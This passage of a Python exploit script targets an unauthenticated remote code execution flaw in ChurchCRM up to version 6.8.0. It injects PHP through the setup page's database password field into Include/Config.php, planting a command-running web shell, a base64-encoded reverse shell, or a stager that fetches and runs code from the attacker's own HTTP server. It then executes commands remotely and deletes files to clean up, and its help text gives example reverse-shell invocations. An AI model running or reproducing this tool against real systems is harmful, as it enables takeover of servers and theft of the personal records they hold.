Examples:
>>> safe_urljoin('http://example.com/churchcrm', '/setup/')
'http://example.com/churchcrm/setup/'
>>> safe_urljoin('http://example.com/churchcrm/', 'setup/')
'http://example.com/churchcrm/setup/'
"""
base = base.rstrip('/')
if path.startswith('/'):
parsed = urlparse(base)
base_without_path = f"{parsed.scheme}://{parsed.netloc}"
base_path = parsed.path.rstrip('/')
return f"{base_without_path}{base_path}{path}"
else:
return f"{base}/{path.lstrip('/')}"
def normalize_url(url: str) -> str:
"""Normalize URL by adding scheme if missing and removing trailing slash"""
if not url.startswith(('http://', 'https://')):
url = 'http://' + url
return url.rstrip('/')
def parse_target(url: str) -> TargetInfo:
"""Parse target URL and return TargetInfo"""
url = normalize_url(url)
parsed = urlparse(url)
return TargetInfo(
url=url,
base_path=parsed.path.rstrip('/') or '/',
scheme=parsed.scheme,
host=parsed.hostname,
port=parsed.port or (443 if parsed.scheme == 'https' else 80),
)
def discover_base_path(session: requests.Session, base_url: str,
paths: List[str] = None, logger: logging.Logger = None) -> Optional[str]:
"""
Discover the correct base path by trying common paths
"""
if paths is None:
paths = DEFAULT_PATHS
parsed = urlparse(base_url)
base = f"{parsed.scheme}://{parsed.netloc}"
for path in paths:
test_url = f"{base}{path}" if path else base
try:
setup_url = safe_urljoin(test_url, '/setup/')
if logger:
logger.debug(f"Trying path: {setup_url}")
response = session.get(setup_url, timeout=5, allow_redirects=False)
if response.status_code in [200, 301, 302]:
if logger:
logger.info(f"Found ChurchCRM at: {test_url}")
return test_url
except:
continue
return None
class ColoredFormatter(logging.Formatter):
"""Custom formatter with colors"""
COLORS = {
'DEBUG': '\033[36m',
'INFO': '\033[32m',
'WARNING': '\033[33m',
'ERROR': '\033[31m',
'CRITICAL': '\033[35m',
'RESET': '\033[0m'
}
def format(self, record):
levelname = record.levelname
if levelname in self.COLORS:
record.levelname = f"{self.COLORS[levelname]}{levelname}{self.COLORS['RESET']}"
return super().format(record)
def setup_logger(debug: bool = False) -> logging.Logger:
"""Setup logger with appropriate configuration"""
logger = logging.getLogger('churchcrm_exploit')
logger.setLevel(logging.DEBUG if debug else logging.INFO)
if not logger.handlers:
handler = logging.StreamHandler(sys.stdout)
formatter = ColoredFormatter(
'%(asctime)s [%(levelname)s] %(message)s',
datefmt='%H:%M:%S'
)
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
def create_session(retries: int = MAX_RETRIES) -> requests.Session:
"""Create requests session with retry logic"""
session = requests.Session()
retry_strategy = Retry(
total=retries,
backoff_factor=0.5,
status_forcelist=[500, 502, 503, 504],
allowed_methods=["HEAD", "GET", "OPTIONS", "POST"]
)
adapter = HTTPAdapter(max_retries=retry_strategy)
session.mount("http://", adapter)
session.mount("https://", adapter)
session.headers.update({
'User-Agent': USER_AGENT,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
})
return session
def random_string(length: int = 8) -> str:
"""Generate random string"""
return ''.join(random.choices(string.ascii_lowercase, k=length))
def random_int_string(min_len: int = 5, max_len: int = 10) -> str:
"""Generate random integer as string"""
length = random.randint(min_len, max_len)
return ''.join(random.choices(string.digits, k=length))
def random_url() -> str:
"""Generate random URL"""
return f"http://{random_string(8)}.com/"
class PayloadHandler(http.server.SimpleHTTPRequestHandler):
"""HTTP handler for serving payloads"""
payload = None
logger = None
request_count = 0
def do_GET(self):
"""Handle GET request"""
PayloadHandler.request_count += 1
if self.logger:
self.logger.debug(f"Payload request #{PayloadHandler.request_count} from {self.client_address[0]}")
if self.payload:
self.send_response(200)
self.send_header('Content-Type', 'application/x-httpd-php')
self.send_header('Content-Length', str(len(self.payload)))
self.send_header('Pragma', 'no-cache')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.end_headers()
self.wfile.write(self.payload.encode())
if self.logger:
self.logger.info(f"Served payload to {self.client_address[0]}")
else:
self.send_response(404)
self.end_headers()
def log_message(self, format, *args):
"""Override to use our logger"""
if self.logger and self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug(f"Payload server: {format % args}")
class PayloadServer:
"""HTTP server for serving payloads"""
def __init__(self, logger: logging.Logger, host: str = '0.0.0.0', port: int = 0):
self.logger = logger
self.host = host
self.port = port
self.server = None
self.thread = None
self.payload = None
def start(self, payload: str) -> str:
"""Start payload server and return URL"""
self.payload = payload
PayloadHandler.payload = payload
PayloadHandler.logger = self.logger
PayloadHandler.request_count = 0
self.server = socketserver.TCPServer((self.host, self.port), PayloadHandler, bind_and_activate=False)
self.server.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.server_bind()
self.server.server_activate()
self.port = self.server.server_address[1]
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.daemon = True
self.thread.start()
server_url = f"http://{self.get_local_ip()}:{self.port}/"
self.logger.info(f"Payload server started at {server_url}")
return server_url
def stop(self):
"""Stop payload server"""
if self.server:
self.server.shutdown()
self.server.server_close()
self.logger.debug(f"Payload server stopped (served {PayloadHandler.request_count} requests)")
def get_local_ip(self) -> str:
"""Get local IP address"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
ip = '127.0.0.1'
finally:
s.close()
return ip
def wait_for_requests(self, timeout: int = 10) -> bool:
"""Wait for at least one request"""
start = time.time()
while time.time() - start < timeout:
if PayloadHandler.request_count > 0:
return True
time.sleep(0.5)
return False
class VersionDetector:
"""Detect ChurchCRM version from response"""
def __init__(self, logger: logging.Logger):
self.logger = logger
self.patterns = [
(re.compile(r'CRM-VERSION:\s*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'header'),
(re.compile(r'<meta[^>]*name=["\']version["\'][^>]*content=["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'meta'),
(re.compile(r'<meta[^>]*content=["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)[^>]*name=["\']version', re.I), 'meta'),
(re.compile(r'<!--\s*ChurchCRM[^\d]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'comment'),
(re.compile(r'ChurchCRM[^\d]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'footer'),
(re.compile(r'window\.ChurchCRM\s*=\s*\{[^}]*version:\s*["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'js'),
(re.compile(r'"softwareVersion"\s*:\s*"([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'json'),
(re.compile(r'ChurchCRM[\/\s-]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'php'),
]
def detect(self, response: requests.Response) -> Optional[Version]:
"""Detect version from response"""
detected_versions = []
if 'CRM-VERSION' in response.headers:
version = self._clean_version(response.headers['CRM-VERSION'])
if version:
self.logger.debug(f"Version found in header: {version}")
detected_versions.append(('header', version))
if 'X-Powered-By' in response.headers:
match = re.search(r'ChurchCRM[\/\s-]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)',
response.headers['X-Powered-By'], re.I)
if match:
version = self._clean_version(match.group(1))
if version:
self.logger.debug(f"Version found in X-Powered-By: {version}")
detected_versions.append(('x-powered', version))
for pattern, source in self.patterns:
matches = pattern.findall(response.text)
for match in matches:
if isinstance(match, tuple):
match = match[0]
version = self._clean_version(match)
if version:
self.logger.debug(f"Version found in {source}: {version}")
detected_versions.append((source, version))
if not detected_versions:
return None
version_counts = {}
for source, version in detected_versions:
version_str = str(version)
version_counts[version_str] = version_counts.get(version_str, 0) + 1
most_common = max(version_counts.items(), key=lambda x: x[1])
self.logger.debug(f"Most common version: {most_common[0]} (appears {most_common[1]} times)")
return Version(most_common[0])
def _clean_version(self, version: str) -> Optional[Version]:
"""Clean and validate version string"""
version = version.strip()
match = re.search(r'([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', version)
if match:
return Version(match.group(1))
return None
def is_vulnerable(self, version: Optional[Version]) -> Optional[bool]:
"""Check if version is vulnerable using enhanced comparison"""
if not version:
return None
try:
vulnerable = version <= '6.8.0'
self.logger.debug(f"Version {version} <= 6.8.0? {vulnerable}")
return vulnerable
except Exception as e:
self.logger.error(f"Version comparison error: {e}")
return None
class ChurchCRMExploit:
"""ChurchCRM RCE Exploit"""
def __init__(self, target_url: str, logger: logging.Logger,
target_type: TargetType = TargetType.LINUX_CMD_STAGER,
lhost: Optional[str] = None, lport: Optional[int] = None,
payload: Optional[str] = None, verify_ssl: bool = True,
proxy: Optional[str] = None, auto_discover: bool = True):
self.logger = logger
self.original_url = target_url
self.target_type = target_type
self.lhost = lhost
self.lport = lport
self.custom_payload = payload
self.verify_ssl = verify_ssl
self.proxy = proxy
self.auto_discover = auto_discover
self.session = create_session()
self.payload_server = None
self.version_detector = VersionDetector(logger)
self.backdoor_injected = False
if proxy:
self.session.proxies = {'http': proxy, 'https': proxy}
self.target = self._initialize_target(target_url)
def _initialize_target(self, target_url: str) -> TargetInfo:
"""Initialize target with optional path discovery"""
try:
info = parse_target(target_url)
test_url = safe_urljoin(info.url, '/setup/')
response = self.session.get(test_url, timeout=5, verify=self.verify_ssl, allow_redirects=False)
if response.status_code in [200, 301, 302]:
self.logger.info(f"Target URL working: {info.url}")
info.detected_paths.append(info.base_path)
return info
except:
pass
if self.auto_discover:
self.logger.info("Direct URL not working, attempting path discovery...")
discovered = discover_base_path(self.session, target_url, logger=self.logger)
if discovered:
info = parse_target(discovered)
info.detected_paths = DEFAULT_PATHS
self.logger.info(f"Discovered ChurchCRM at: {info.url}")
return info
return parse_target(target_url)
def check(self) -> Dict[str, Any]:
"""Check if target is vulnerable"""
self.logger.info(f"Checking target: {self.target.url}")
try:
url = safe_urljoin(self.target.url, '/setup/')
self.logger.debug(f"Accessing {url}")
response = self.session.get(
url,
timeout=TIMEOUT,
verify=self.verify_ssl,
allow_redirects=True
)
self.logger.debug(f"Response code: {response.status_code}")
if response.status_code not in [200, 301, 302]:
self.logger.warning(f"Unexpected response code: {response.status_code}")
return {
'code': CheckCode.UNREACHABLE,
'message': f'Setup page returned HTTP {response.status_code}'
}
version = self.version_detector.detect(response)
if version:
self.logger.info(f"Detected ChurchCRM version: {version}")
vulnerable = self.version_detector.is_vulnerable(version)
self.target.version = str(version)
self.target.vulnerable = vulnerable
if vulnerable:
self.logger.warning("Target appears VULNERABLE!")
return {
'code': CheckCode.VULNERABLE,
'version': str(version),
'message': f'Vulnerable version {version} detected'
}
else:
self.logger.info("Target appears NOT vulnerable")
return {
'code': CheckCode.SAFE,
'version': str(version),
'message': f'Version {version} is not vulnerable'
}
else:
self.logger.warning("Could not detect version")
return {
'code': CheckCode.UNKNOWN,
'message': 'Version unknown - setup page accessible'
}
except RequestException as e:
self.logger.error(f"Request failed: {e}")
return {
'code': CheckCode.UNREACHABLE,
'message': f'Target unreachable: {e}'
}
def build_payload(self) -> str:
"""Build payload based on target type"""
prefix = f"{random_string(3)}';"
if self.target_type == TargetType.PHP_MEMORY:
if self.custom_payload:
php_payload = self.custom_payload
else:
php_payload = self._generate_reverse_shell()
b64_payload = base64.b64encode(php_payload.encode()).decode()
return f"{prefix} eval(base64_decode(\"{b64_payload}\")); //"
elif self.target_type == TargetType.PHP_FETCH:
if not self.payload_server:
raise PayloadServerError("Payload server not started")
payload_name = f"/tmp/{random_string(8)}.php"
server_url = f"http://{self.lhost}:{self.payload_server.port}/"
return (f"{prefix} $f='{payload_name}'; "
f"file_put_contents($f, file_get_contents('{server_url}')); "
f"register_shutdown_function('unlink', $f); include($f); //")
else:
return f"{prefix} system($_GET['cmd']); //"
def _generate_reverse_shell(self) -> str:
"""Generate PHP reverse shell"""
if not self.lhost or not self.lport:
return "phpinfo();"
return f"""<?php
$lhost = '{self.lhost}';
$lport = {self.lport};
if (function_exists('fsockopen') && function_exists('proc_open')) {{
$sock = @fsockopen($lhost, $lport);
if ($sock) {{
$descriptors = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open((PHP_OS == 'WINNT' ? 'cmd' : '/bin/sh'), $descriptors, $pipes);
proc_close($process);
}}
}}
if (function_exists('socket_create') && function_exists('proc_open')) {{
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($sock && @socket_connect($sock, $lhost, $lport)) {{
$descriptors = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open((PHP_OS == 'WINNT' ? 'cmd' : '/bin/sh'), $descriptors, $pipes);
proc_close($process);
}}
}}
?>"""
def inject_backdoor(self) -> bool:
"""Inject backdoor via setup page"""
self.logger.info("Injecting backdoor into Include/Config.php...")
payload = self.build_payload()
post_data = {
'DB_SERVER_NAME': random_string(8),
'DB_SERVER_PORT': '3306',
'DB_NAME': random_string(8),
'DB_USER': random_string(6),
'DB_PASSWORD': payload,
'ROOT_PATH': '/',
'URL': random_url()
}
self.logger.debug(f"POST data prepared (password field contains payload)")
try:
url = safe_urljoin(self.target.url, '/setup/')
self.logger.debug(f"Sending POST to {url}")
response = self.session.post(
url,
data=post_data,
timeout=TIMEOUT,
verify=self.verify_ssl,
allow_redirects=False
)
if response.status_code == 200:
self.logger.info("Backdoor injected successfully!")
self.backdoor_injected = True
return True
else:
self.logger.error(f"Injection failed with HTTP {response.status_code}")
return False
except RequestException as e:
self.logger.error(f"Injection request failed: {e}")
return False
def execute_command(self, cmd: str) -> Optional[str]:
"""Execute command on target"""
if not self.backdoor_injected:
self.logger.warning("Backdoor not injected yet. Attempting injection...")
if not self.inject_backdoor():
self.logger.error("Cannot execute command: backdoor injection failed")
return None
self.logger.info(f"Executing command: {cmd}")
try:
url = safe_urljoin(self.target.url, '/')
self.logger.debug(f"Command URL: {url}?cmd={quote(cmd)}")
response = self.session.get(
url,
params={'cmd': cmd},
timeout=TIMEOUT,
verify=self.verify_ssl
)
if response.status_code == 200:
output = response.text.strip()
if '<html' in output.lower():
body_match = re.search(r'<body[^>]*>(.*?)</body>', output, re.S | re.I)
if body_match:
output = body_match.group(1).strip()
output = re.sub(r'<[^>]+>', ' ', output)
output = re.sub(r'\s+', ' ', output).strip()
return output
else:
self.logger.error(f"Command execution failed with HTTP {response.status_code}")
return None
except RequestException as e:
self.logger.error(f"Command execution request failed: {e}")
return None
def cleanup(self) -> bool:
"""Clean up - remove backdoor"""
if not self.backdoor_injected:
self.logger.debug("No backdoor to clean up")
return True
self.logger.info("Cleaning up...")
commands = [
'rm -f Include/Config.php',
'rm Include/Config.php',
'rm -f churchcrm/Include/Config.php',
'del /f Include\\Config.php',
'php -r "unlink(\'Include/Config.php\');"',
'php -r "unlink(\'churchcrm/Include/Config.php\');"'
]
success = False
for cmd in commands:
result = self.execute_command(cmd)
if result is not None: # Command executed (even if file doesn't exist)
self.logger.debug(f"Cleanup command executed: {cmd}")
success = True
if success:
self.logger.info("Cleanup completed")
self.backdoor_injected = False
else:
self.logger.warning("Cleanup may have failed")
return success
def run_cmd_stager(self, cmd: str) -> Tuple[bool, Optional[str]]:
"""Run command stager"""
output = self.execute_command(cmd)
return (output is not None, output)
def run_php_memory(self) -> Tuple[bool, Optional[str]]:
"""Run PHP in-memory payload"""
self.logger.info("Executing PHP in-memory payload...")
try:
url = safe_urljoin(self.target.url, '/')
self.logger.debug(f"Triggering payload via GET to {url}")
response = self.session.get(url, timeout=TIMEOUT, verify=self.verify_ssl)
if response.status_code == 200:
self.logger.info("PHP payload executed successfully")
return (True, response.text[:500] + "..." if len(response.text) > 500 else response.text)
else:
self.logger.error(f"PHP execution failed with HTTP {response.status_code}")
return (False, None)
except RequestException as e:
self.logger.error(f"PHP execution request failed: {e}")
return (False, None)
def run_php_fetch(self) -> Tuple[bool, Optional[str]]:
"""Run PHP fetch payload"""
self.logger.info("Executing PHP fetch payload...")
self.payload_server = PayloadServer(self.logger, host='0.0.0.0')
if self.custom_payload:
payload = self.custom_payload
else:
payload = self._generate_reverse_shell()
try:
server_url = self.payload_server.start(payload)
self.logger.info(f"Serving payload from {server_url}")
time.sleep(2)
if self.inject_backdoor():
self.logger.info("Waiting for payload request...")
if self.payload_server.wait_for_requests(timeout=30):
self.logger.info("Payload was fetched by target")
time.sleep(5)
success = True
else:
self.logger.warning("No payload request received")
success = False
else:
success = False
return (success, None)
finally:
self.payload_server.stop()
def exploit(self) -> ExploitResult:
"""Main exploit method"""
self.logger.info(f"Starting exploit against {self.target.url}")
self.logger.info(f"Target type: {self.target_type.value}")
check_result = self.check()
if check_result['code'] == CheckCode.UNREACHABLE:
return ExploitResult(
success=False,
message=f"Target unreachable: {check_result['message']}"
)
if check_result['code'] == CheckCode.SAFE:
return ExploitResult(
success=False,
message=check_result['message']
)
if not self.inject_backdoor():
return ExploitResult(
success=False,
message="Failed to inject backdoor"
)
success = False
output = None
if self.target_type == TargetType.LINUX_CMD_STAGER:
if self.custom_payload:
success, output = self.run_cmd_stager(self.custom_payload)
else:
success, output = self.run_cmd_stager('id')
if success and output:
self.logger.info(f"Command output: {output.strip()}")
elif self.target_type == TargetType.PHP_MEMORY:
success, output = self.run_php_memory()
elif self.target_type == TargetType.PHP_FETCH:
success, output = self.run_php_fetch()
self.cleanup()
return ExploitResult(
success=success,
message="Exploit completed successfully" if success else "Exploit failed",
target=self.target,
output=output
)
def main():
"""Main entry point"""
parser = argparse.ArgumentParser(
description='ChurchCRM Unauthenticated RCE Exploit by indoushka',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Check vulnerability
%(prog)s http://target.com/churchcrm --check
# Execute command
%(prog)s http://target.com --cmd "id"
# Reverse shell (Linux)
%(prog)s http://target.com --reverse 192.168.1.100 4444
# Reverse shell with PHP fetch method
%(prog)s http://target.com --type php-fetch --reverse 192.168.1.100 4444
# Custom PHP payload
%(prog)s http://target.com --payload "<?php phpinfo(); ?>"
# With proxy and debug
%(prog)s http://target.com --check --proxy http://127.0.0.1:8080 --debug
Exit codes:
0 - Not vulnerable / Success
1 - Error / Unknown
2 - Vulnerable
"""
)
parser.add_argument('target', help='Target URL (e.g., http://target.com/churchcrm)')
parser.add_argument('--check', action='store_true', help='Check if target is vulnerable')
parser.add_argument('--cmd', metavar='COMMAND', help='Execute command')
parser.add_argument('--reverse', nargs=2, metavar=('LHOST', 'LPORT'),
help='Reverse shell (LHOST LPORT)')
parser.add_argument('--payload', metavar='CODE', help='Custom PHP payload')
parser.add_argument('--payload-file', metavar='FILE', help='PHP payload file')
parser.add_argument('--type', choices=['linux', 'php-memory', 'php-fetch'],
default='linux', help='Target type (default: linux)')
parser.add_argument('--proxy', help='HTTP proxy (e.g., http://127.0.0.1:8080)')
parser.add_argument('--no-verify', action='store_true', help='Disable SSL verification')
parser.add_argument('--debug', action='store_true', help='Enable debug output')
parser.add_argument('--no-discover', action='store_true',
help='Disable automatic path discovery')
args = parser.parse_args()
logger = setup_logger(args.debug)
if not any([args.check, args.cmd, args.reverse, args.payload, args.payload_file]):
logger.error("No action specified. Use --help for usage.")
sys.exit(1)
target_type_map = {
'linux': TargetType.LINUX_CMD_STAGER,
'php-memory': TargetType.PHP_MEMORY,
'php-fetch': TargetType.PHP_FETCH
}
target_type = target_type_map[args.type]
payload = None
if args.payload:
payload = args.payload
elif args.payload_file:
try:
with open(args.payload_file, 'r') as f:
payload = f.read()
except Exception as e:
logger.error(f"Failed to read payload file: {e}")
sys.exit(1)
try:
exploit = ChurchCRMExploit(
target_url=args.target,
logger=logger,
target_type=target_type,
lhost=args.reverse[0] if args.reverse else None,
lport=int(args.reverse[1]) if args.reverse else None,
payload=payload,
verify_ssl=not args.no_verify,
proxy=args.proxy,
auto_discover=not args.no_discover
)
except Exception as e:
logger.error(f"Failed to initialize exploit: {e}")
if args.debug:
import traceback
traceback.print_exc()
sys.exit(1)
try:
if args.check:
result = exploit.check()
if result['code'] == CheckCode.VULNERABLE:
logger.warning(f"Target is VULNERABLE! Version: {result.get('version', 'unknown')}")
sys.exit(2)
elif result['code'] == CheckCode.SAFE:
logger.info("Target is NOT vulnerable")
sys.exit(0)
else:
logger.warning(f"Unknown status: {result['message']}")
sys.exit(1)
elif args.cmd:
logger.info(f"Executing command: {args.cmd}")
if exploit.target_type != TargetType.LINUX_CMD_STAGER:
logger.warning(f"Switching target type from {exploit.target_type.value} to linux_cmd_stager")
exploit.target_type = TargetType.LINUX_CMD_STAGER
result = exploit.exploit()
if result.success and result.output:
print("\n" + "="*60)
print("COMMAND OUTPUT:")
print("="*60)
print(result.output)
print("="*60)
elif result.success:
print("\nCommand executed successfully (no output)")
else:
logger.error(f"Command execution failed: {result.message}")
sys.exit(1)
elif args.reverse:
logger.info(f"Attempting reverse shell to {args.reverse[0]}:{args.reverse[1]}")
if args.type == 'php-fetch':
exploit.target_type = TargetType.PHP_FETCH
elif args.type == 'php-memory':
exploit.target_type = TargetType.PHP_MEMORY
else:
exploit.target_type = TargetType.LINUX_CMD_STAGER
result = exploit.exploit()
if result.success:
logger.info("Reverse shell payload sent. Check your listener!")
if result.output:
print(f"\nOutput: {result.output}")
else:
logger.error(f"Reverse shell failed: {result.message}")
sys.exit(1)
else:
result = exploit.exploit()
if result.success:
logger.info("Exploit completed successfully!")
if result.output:
print(f"\nOutput: {result.output}")
else:
logger.error(f"Exploit failed: {result.message}")
sys.exit(1)
except KeyboardInterrupt:
logger.info("Interrupted by user")
sys.exit(130)
except Exception as e:
logger.error(f"Unexpected error: {e}")
if args.debug:
import traceback
traceback.print_exc()
sys.exit(1)
if __name__ == '__main__':
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================